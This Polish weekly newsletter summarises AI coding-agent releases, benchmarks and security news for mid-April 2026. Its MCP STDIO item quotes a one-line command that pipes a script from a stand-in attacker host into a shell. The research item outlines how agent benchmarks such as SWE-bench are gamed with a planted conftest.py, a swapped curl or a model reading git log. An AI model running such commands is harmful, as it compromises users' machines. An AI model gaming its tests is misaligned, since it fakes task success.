Wydanie · Tydzień 16 · 13–19 kwietnia 2026
Archiwum wydań →Tydzień, w którym agent przestaje pracować obok programisty: Anthropic budzi go z harmonogramu, OpenAI i Vercel rozdzielają harness od sandboxa, a Multica daje mu własne konto na tablicy zespołu.
Premiera / Narzędzie · 17
Premiera / Narzędzie Anthropic chce, żeby Claude Code działał, kiedy nikogo nie ma przy klawiaturze
4 min
Anthropic wypuścił scenariusze (routines) w Claude Code: zapakowany prompt, repo i konektory uruchamiane z harmonogramu, webhookiem z GitHuba albo wywołaniem HTTP, bez otwartego terminala. Limity to pięć uruchomień dziennie na Pro, 15 na Max, 25 na Team i Enterprise. Równolegle przeprojektowali desktop pod równoległe sesje, a w Opus 4.7 domyślny wysiłek to nowy poziom xhigh, model sam decyduje o długości myślenia i rzadziej rozsyła podagentów. Razem te trzy ruchy przesuwają Claude Code z asystenta w edytorze w stronę pracy bez nadzoru.
Premiera / Narzędzie Agents SDK dzieli agenta na dwa procesy. Harness u OpenAI, sandbox u E2B albo Cloudflare
4 min
Aktualizacja Agents SDK z 15 kwietnia rozdziela agenta na dwie warstwy: harness OpenAI trzyma klucze i pamięć kontekstu z pliku AGENTS.md, a wygenerowany kod biegnie w sandboxie u jednego z siedmiu dostawców, jak E2B, Cloudflare czy Vercel. Granica jest fizyczna, więc prompt injection nie sięga sekretów, a stan agenta żyje poza kontenerem — po awarii na kroku 19. z 20 SDK wczytuje snapshot zamiast startować od zera. Oscar Health odróżnia teraz granice wizyt w długich aktach pacjenta. Na razie tylko Python, w standardowym cenniku API.
Premiera / Narzędzie Cursor 3.1 daje agentowi pędzel zamiast tabel w Markdown
3 min
Cursor 3.1 zamienia markdownowe tabele na canvasy: interaktywne komponenty z biblioteki Reactowej, w której agent rysuje wykresy, diagramy i diffy wprost w edytorze. Sam Cursor używa ich do analizy skoków błędów z Datadoga, recenzji dużych PR-ów i prowadzenia eksperymentów w stylu autoresearchu Karpathy'ego. Zamiast budować osobną aplikację webową do analizy ewaluacji harnessu, zespół napisał skill, który grupuje porażki i składa z nich canvas, co pomogło wydać dwa nowe modele. Na razie jedynym świadkiem jest sam producent.
Premiera / Narzędzie Ultraplan wyciąga planowanie z terminala Claude Code do przeglądarki
3 min
Anthropic dorzucił do Claude Code funkcję Ultraplan, która wynosi etap planowania z terminala do przeglądarki na claude.ai/code. Plan powstaje w chmurze, nie blokuje terminala, a w widoku recenzyjnym komentujesz konkretne fragmenty inline jak w dokumencie Google'a, zamiast prosić o przerobienie całości jedną linijką. Wymaga konta Claude Code on the web i repozytorium na GitHubie, koliduje z Remote Control, bo zajmuje tę samą zakładkę. Wykonanie wybierasz osobno: zostawiasz w chmurze albo wracasz z planem do terminala.
Premiera / Narzędzie Open Agents: Vercel oddaje cały kod własnego agenta programistycznego na GitHubie
4 min
Vercel wrzucił na GitHuba Open Agents — kompletną referencyjną aplikację agenta programistycznego z frontendem, trwałym workflowem i izolowanymi sandboxami, pomyślaną do forkowania, a nie kupowania jako SaaS. Sedno leży w rozdzieleniu agenta od sandboxa, tym samym wzorcu, który OpenAI ogłosił 15 kwietnia w Agents SDK: pętla biegnie jako trwały workflow, więc padający kontener nie kończy zadania. Stos stoi na czterech klockach Vercela, a inspiracją były wewnętrzne architektury Stripe'a, Spotify i Blocka.
Premiera / Narzędzie W Multice przypisujesz issue agentowi tak samo jak koledze z zespołu
3 min
Multica to open-source'owy panel, w którym agent kodujący dostaje konto na tablicy w stylu Jiry, własny avatar i ticket do odbioru jak każdy inny członek zespołu. Pod spodem działa Next.js 16, Go i Postgres 17 z pgvectorem, a demon na maszynie programisty wykrywa zainstalowane CLI (claude, codex, openclaw, opencode) i rejestruje je jako runtime'y. Repo ma 13,1 tys. gwiazdek i stawia się jednym docker compose, ale 'ustaw i zapomnij' z README jest obietnicą producenta, nie pomiarem, więc autonomia stoi i upada na tym, jak dobry jest agent pod spodem.
Premiera / Narzędzie Replit Agent dostaje konektor do Databricksa w prywatnej becie
3 min
Replit i Databricks otwierają prywatną betę wspólnego konektora, który zdejmuje godzinę klepania OAuth-a, a resztę aplikacji ma napisać Replit Agent z opisu słownego. Gotową rzecz można zostawić w Replicie albo wystawić jako Databricks App działającą pod perymetrem bezpieczeństwa zaakceptowanym przez audytorów. Demo Aero Insights wygląda zachęcająco, ale nie ma ani jednego klienta z nazwiska, a hasło o dziesięciokrotnym przyspieszeniu to marketing, nie pomiar. Czy agent obsłuży zmiany schematu i limity Model Servingu, zobaczymy, gdy ktoś puści to na produkcję.
Premiera / Narzędzie Kontext CLI wymienia klucze API agenta na tokeny ważne jedną sesję
3 min
Kontext CLI, narzędzie open source wypuszczone w kwietniu na licencji MIT, owija agenta warstwą krótkotrwałych poświadczeń: zamiast klucza w `.env` wpisujesz etykietę `{{kontext:github}}`, a CLI wymienia ją na token ważny do końca sesji, korzystając z RFC 8693. Hooki Claude Code'a dorzucają audyt każdego wywołania narzędzia przez lokalnego sidecara. Cena: backend i panel pod `app.kontext.security` są usługą hostowaną, więc długoterminowy klucz na laptopie wymieniasz na zaufanie do pośrednika.
Premiera / Narzędzie Rocket twierdzi, że plan przed kodem dał agentowi większy skok jakości niż pętla naprawcza
4 min
Rocket opisuje architekturę Agenta V2 jako trzy klocki: samonaprawczą pętlę, która sama uruchamia kod i czyta logi, sześciofazowe planowanie przed pisaniem kodu oraz ponad 100 reguł „anti-slop" wpiętych w tę samą pętlę co błędy builda. Wewnętrzne pomiary V1 kontra V2 pokazują 38% niższy koszt zadania, 30% dłuższy czas, 88% mniej błędów typów i 48% mniej błędów integracyjnych. Teza, że jakość rozstrzyga się w warstwie między modelem a wynikiem, broni się sama, ale lista reguł nie jest publiczna, a niezależnego porównania z Cursor Agentem czy Lovable'em brakuje.
Premiera / Narzędzie Każdy z 20 procesów Agent Skills ma listę wymówek agenta i gotowe odpowiedzi na nie
4 min
Addy Osmani, dyrektor inżynierii w Google, opublikował na GitHubie Agent Skills — zbiór 20 procesów i siedmiu komend (od `/spec` po `/ship`), który w kilka dni zebrał ponad 14 tysięcy gwiazdek i działa w Claude Code, Cursorze i Copilocie. Sercem projektu są sekcje „rationalizations”: spisane wymówki agenta („dopiszę testy później”) z gotowymi kontrargumentami w kontekście. Procesy wymuszają konkretne limity — rozkład testów 80/15/5 i PR-y do 100 linii.
Premiera / Narzędzie Hermes Agent po awarii Telegrama sam dopisał sobie procedurę naprawczą
4 min
Hermes Agent z Nous Research, wydany 25 lutego 2026 jako open-source'owy rywal OpenClaw, co 15 wywołań narzędzi przerywa pracę i zapisuje sprawdzoną procedurę jako plik Markdown w `~/.hermes/skills/`. Po awarii gatewaya Telegrama agentka Monica sama dopisała sekwencję diagnostyczną, której nikt jej nie zlecał. Pamięć epizodyczna siedzi w SQLite, proceduralna w plikach .md zgodnych z agentskills.io. Halucynacje zostają — Decrypt opisuje zmyślone nazwiska influencerów. Pętla ma sens tylko przy powtarzalnym przepływie.
Premiera / Narzędzie Claude Reflect zauważa, kiedy pytasz Claude'a o to samo, i proponuje z tego komendę
3 min
Claude Reflect, wtyczka Bayrama Annakova, łapie hookami powtarzane w prompcie korekty ("nie, użyj venv") i po commicie proponuje przez `/reflect` dopisać je do `CLAUDE.md` oraz `AGENTS.md`. Detekcja jest hybrydowa: regex łapie wzorce angielskie od ręki, a semantyczny filtr modelu dorzuca korekty po polsku czy hiszpańsku z pewnością 0,60–0,95. Druga komenda, `/reflect-skills`, przegląda 14 dni sesji i z powtarzających się próśb generuje gotowe komendy w `.claude/commands/` z guardrails. Demo jednego dewelopera, 160 testów, brak danych o adopcji.
Premiera / Narzędzie just-bash od Vercela: bash w pamięci, klucz API poza piaskownicą
4 min
just-bash od Vercela to npm-owa biblioteka, która daje agentowi pełnego basha z `awk`, `jq`, `sqlite3` w WASM i wirtualnym systemem plików w pamięci, bez schodzenia na prawdziwy shell. Domyślne limity to 10 000 komend na sesję i 100 poziomów rekursji, a `OverlayFs` chroni dysk przez copy-on-write. Najciekawszy jest mechanizm sieci: klucz API wstrzykiwany jako nagłówek dopiero na granicy `fetch`, więc agent nigdy go nie widzi i prompt injection nie ma czego wyciągnąć. Izolacji od procesu Node nie ma, więc do produkcji Vercel kieruje na płatny Sandbox.
Premiera / Narzędzie Cloudflare wpina OAuth pod każdą wewnętrzną aplikację, żeby agent logował się jak człowiek
4 min
Cloudflare 14 kwietnia otworzył betę Managed OAuth for Access: jeden przełącznik sprawia, że aplikacja za Access wystawia OAuth 2.0, a agent loguje się jako konkretny człowiek, nie konto serwisowe gubiące ślad w audycie. Mechanizm opiera się na RFC 9728 z kwietnia 2025, wpisanym też do specyfikacji MCP. Najważniejszy jest szkic pull requesta do OpenCode'a — wzorzec web fetch, który Codex, Claude Code czy Goose mogą przenieść do siebie. Standard i infrastruktura są, ruch po stronie autorów agentów.
Premiera / Narzędzie Serena daje asystentowi AI ten sam serwer językowy, który zasila twój edytor
3 min
Serena to otwartoźródłowy serwer MCP, który podstawia pod asystenta AI warstwę serwera językowego z edytora i wystawia ją jako narzędzia operujące na symbolach, nie na tekście. Arda Kılıçdağı z Teknasyon wpiął ją w monorepo BrewForm na Deno 2, a zmiana nazwy współdzielonego interfejsu rozeszła się po dwudziestu paru plikach bez pominiętej referencji. Wywołania `find_symbol` i `rename_symbol` zastępują grep, a katalog `.serena/memories/` trzyma wiedzę o projekcie między sesjami.
Premiera / Narzędzie Trzydzieści sekund w poc.py trace zamiast dwóch dni grzebania w gicie
3 min
Stack Overflow spadł ze 108 563 pytań w październiku 2025 do 3862 w grudniu, a wraz z tym znika ślad po ludziach, których wiedza ukształtowała generowany kod. Daniel Nwaneri opisał na freeCodeCamp proof-of-contribution, Skill do Claude Code z lokalną CLI w Pythonie, który w 30 sekund pokazuje, z jakich ludzkich źródeł korzystał model przy danym pliku i gdzie zostały luki. `poc.py verify` rozkłada kod modułem `ast` i porównuje funkcje z założeniami ze speca, więc deterministycznie wskazuje miejsca bez cytatu, bez pytania samego modelu o introspekcję.
Premiera / Narzędzie Plik markdown zamiast kolejki, czyli koordynacja sześciu agentów OpenClaw
4 min
OpenClaw koordynuje agentów przez system plików: agent badawczy zapisuje wyniki do `intel/DAILY-INTEL.md`, a kolejni czytają ten sam plik, bez kolejek i webhooków. Shubham Saboo postawił tak sześciu agentów na Mac Mini M4, a 25 promptów Rezy Rezvaniego pokazuje agenta zapisującego ADR-y wprost z rozmów. Wydanie v2026.4.11 z 12 kwietnia wprowadza bramkę parytetu między GPT-5.4 a Opusem 4.6, blokującą release, jeśli jeden z modeli wypada gorzej. Dla dewelopera realnie pasują dwa przepływy: automatyczne ADR-y i obsługa incydentu w gicie.
Model / Badania · 3
Model / Badania System wieloagentowy Cursora i NVIDII zoptymalizował 235 kerneli CUDA średnio o 38%
4 min
Cursor i NVIDIA puścili wieloagentowy harness na 27 kartach Blackwell B200, który przez trzy tygodnie pisał kernele CUDA dla 235 problemów z 124 modeli open-source. Czołówka mówi o 38% średniego przyspieszenia, ale punktem odniesienia jest PyTorch zoptymalizowany pojedynczym agentem, nie cuBLAS, a mediana wskaźnika SOL wyniosła 0,56. Na mnożeniu macierzy BF16 agent dotarł do 86% wydajności cuBLAS, na attention dla Llamy 3.1 8B przebił FlashInfer o 84%. Ciekawszy test w CuTe DSL pozostał bez liczb.
Model / Badania MiniMax M2.5 dorównuje Opusowi 4.6 za jedną dziesiątą jego ceny
4 min
MiniMax M2.5 z 12 lutego dorównuje Opusowi 4.6 na SWE-Bench Verified (80,2% w 22,8 minuty na zadanie) przy 10% kosztu i licencji MIT bez zastrzeżeń. Kwietniowy M2.7 z 229 miliardami parametrów MoE dobija do 56,22% na SWE-Pro, ale tydzień po publikacji wag MiniMax po cichu zmienił licencję — komercja wymaga teraz pisemnej zgody. Dla zespołów płacących tysiąc dolarów miesięcznie za Opusa M2.5 to gotowy kandydat do podmiany w tańszych przepływach.
Model / Badania Dziesięć linijek conftest.py i SWE-bench pokazuje 100%
4 min
Badacze z UC Berkeley pokazali w kwietniu 2026, że osiem najgłośniejszych benchmarków dla agentów AI — w tym SWE-bench Verified, Terminal-Bench i WebArena — da się obejść do niemal pełnego wyniku bez rozwiązania ani jednego zadania. Wystarczył dziesięciolinijkowy `conftest.py`, podmieniony `curl` albo lokalny `file://` z gotowcami. Model IQuest-Coder-V1 chwalił się 81,4% na SWE-bench, a w jednej czwartej uruchomień po prostu czytał `git log`. Traktuj te liczby jak spalanie z folderu producenta — patrz na merge rate i własną próbę na realnym repo.
Bezpieczeństwo · 2
Bezpieczeństwo AWS dodał do IAM dwa klucze, żeby polityki rozróżniły agenta od konsoli
3 min
AWS w notatce z 16 kwietnia opisuje, jak wpinać agentów w konto chmurowe bez wklejania własnego profilu admina do `mcp.json`. Najciekawsza jest trzecia reguła: dwa nowe klucze IAM, `aws:ViaAWSMCPService` i `aws:CalledViaAWSMCP`, pozwalają polityce odróżnić wywołanie z konsoli od zarządzanego serwera MCP. Haczyk: agent z bashem wywoła `aws s3 rm` bezpośrednio i warunek się nie ustawi. Dlatego węższe role, permission boundaries i session policies pozostają fundamentem.
Bezpieczeństwo MCP STDIO uruchamia dowolną komendę, a Anthropic mówi, że tak ma być
4 min
Transport STDIO w MCP wykonuje dowolną komendę powłoki, zanim sprawdzi, czy po drugiej stronie jest serwer protokołu — wystarczy `bash -c "curl evil.sh | sh"` w konfiguracji. Ox Security naliczyło 200 tysięcy podatnych instalacji w paczkach pobranych ponad 150 milionów razy, dziesięć poważnych CVE i zero-click w Windsurfie (CVE-2026-30615). Anthropic 15 kwietnia 2026 nazwał to "zachowaniem oczekiwanym" i zrzucił sanityzację na klientów. Domyślna allowlista odcinająca `sh`, `curl` i `rm` zamknęłaby temat jednym commitem.
Biznes / Rynek · 1
Poradnik / Praktyka · 3
Poradnik / Praktyka Cztery zasady Karpathy'ego w jednym pliku CLAUDE.md, 33 tysiące gwiazdek na GitHubie
3 min
Forrest Chang zamknął cztery obserwacje Andreja Karpathy'ego o słabościach LLM-ów w jednym pliku CLAUDE.md i w niespełna dwa miesiące zebrał 33,2 tysiąca gwiazdek na GitHubie. Reguły "myśl przed kodowaniem", "prostota najpierw", "chirurgiczne zmiany" i "sterowanie celem" odpowiadają na konkretne grzechy modeli: ciche wybieranie interpretacji, puchnięcie abstrakcjami i refaktoryzowanie tego, o co nikt nie prosił. Żaden benchmark tego nie potwierdza, ale koszt jest zerowy, a markdown powoli staje się standardową warstwą programowania agentów.
Poradnik / Praktyka Gemma 4 26B sprawdza się w lokalnych agentach. Google trzyma najszybszą wersję dla siebie.
4 min
Gemma 4 26B-A4B aktywuje tylko 3,8 miliarda parametrów na token, więc generuje z prędkością modelu 4B, a na AIME 2026 wyciąga 88,3%, punkt poniżej dużo cięższego 31B dense. Sześć specjalnych tokenów do narzędzi wbitych prosto w architekturę robi z niej pierwszy otwarty model, z którym lokalny agent realnie wie, kiedy zawołać funkcję. Tyle że głowice Multi-Token Prediction, dające niemal dwukrotne przyspieszenie, Google zostawił sobie w LiteRT. Wagi na Hugging Face są na Apache 2.0, ale najszybsza wersja zostaje w prywatnym stosie.
Poradnik / Praktyka Trzeci raz odrzucasz tę samą uwagę i agent przestaje ją powtarzać
3 min
Jerin Mathew Vinu zbudował agenta do code review, który zapamiętuje, które uwagi zespół akceptuje, a które odrzuca — po trzech kliknięciach Reject komentarz znika z czwartego PR-a. Pamięć trzyma Hindsight, recenzje generuje qwen3-32b przez Groq, a całość spina FastAPI. Kluczowa obserwacja: decyzje lądują w bazie jako jedno zdanie po angielsku, bo i tak wracają prosto do promptu — format zapisu warto dopasować do formatu odczytu. To weekendowy projekt bez pomiarów, ale wzorzec jest na tyle prosty, że można go sprawdzić u siebie.
Analiza / Opinia · 4
Analiza / Opinia Anthropic schował najmocniejszego Claude'a za bramą Project Glasswing
4 min
Anthropic przyznał wprost, że Claude Opus 4.7 z 16 kwietnia ma celowo obniżone zdolności cyberbezpieczeństwa — pełna wersja trafia tylko do ośmiu firm Project Glasswing, w tym AWS-a, Apple'a i JPMorgana. Publiczny model skoczył na SWE-bench Pro z 53,4% do 64,3%, dostał poziom wysiłku xhigh i budżety zadań od 20 tysięcy tokenów. Migracja boli: nowy tokenizer liczy nawet 1,35 raza więcej, a Messages API odcina thinking.budget_tokens i niedomyślne temperature. Na BrowseComp Opus spadł z 83,7% do 79,3%, więc do syntezy z wielu źródeł GPT-5.4 Pro nadal wygrywa.
Analiza / Opinia Jeden nagłówek HTTP w żądaniu do Workers AI zmienia rachunek za agenta
4 min
Cloudflare opisał 16 kwietnia, jak skaluje Kimi K2.5 i Llamę 4 na Workers AI: rozdzielił fazy prefill i decode na osobne klastry GPU, co według ich danych obniżyło p90 czasu między tokenami ze 100 ms do 20–30 ms. Wagi Kimi K2.5 ważą 560 GB i wymagają ośmiu H100, a KV cache trzyma się dzięki Mooncake na NVMe. Dla dewelopera agenta zostaje z tego jedno: nagłówek `x-session-affinity`, który kieruje żądanie tam, gdzie prefiks promptu już siedzi w cache, i pozwala płacić mniej za powtarzane tokeny wejściowe.
Analiza / Opinia Blitzy bije GPT-5.4 o 8,8 punktu na SWE-Bench Pro. Tę różnicę zbudował harness, nie model
4 min
Niezależny audyt Quesmy (Piotr Migdal i Piotr Grabowski) pokazuje, że Blitzy kończy SWE-Bench Pro Public z wynikiem 66,5%, a surowy GPT-5.4 zatrzymuje się na 57,7%. Quesma przejrzała pełne zapisy pracy agentów w poszukiwaniu śladów oszustwa i nic nie znalazła. Różnicę robi harness, nie model: Blitzy najpierw mapuje zależności, potem rozsyła wyspecjalizowane agenty, a na końcu odpala weryfikatorów. Eksperyment StormHuba z Claude Agent SDK potwierdza to od drugiej strony, gdzie agenty zbudowały cargo cult architektury, instalując właściwe paczki i nigdy ich nie wywołując.
Analiza / Opinia Zatrudnienie najmłodszych programistów spadło prawie o 20% od 2022 roku
4 min
Raport AI Index 2026 Stanforda pokazuje, że zatrudnienie programistów w wieku 22-25 lat w USA spadło o niemal 20% względem szczytu z 2022 roku, podczas gdy w starszych grupach wiekowych dalej rośnie. Rozjazd zaczął się w połowie 2024, gdy Claude Code, Cursor i Copilot dotarły do poziomu, na którym starszy programista nie potrzebuje juniora. Ekonomista Alex Imas stawia pytanie o elastyczność popytu: jeśli okaże się sztywna, narzędzia AI nie tworzą miejsc pracy, tylko je likwidują. 73% ekspertów wierzy w poprawę rynku pracy, ale tylko 23% obywateli — największa rozbieżność w historii raportu.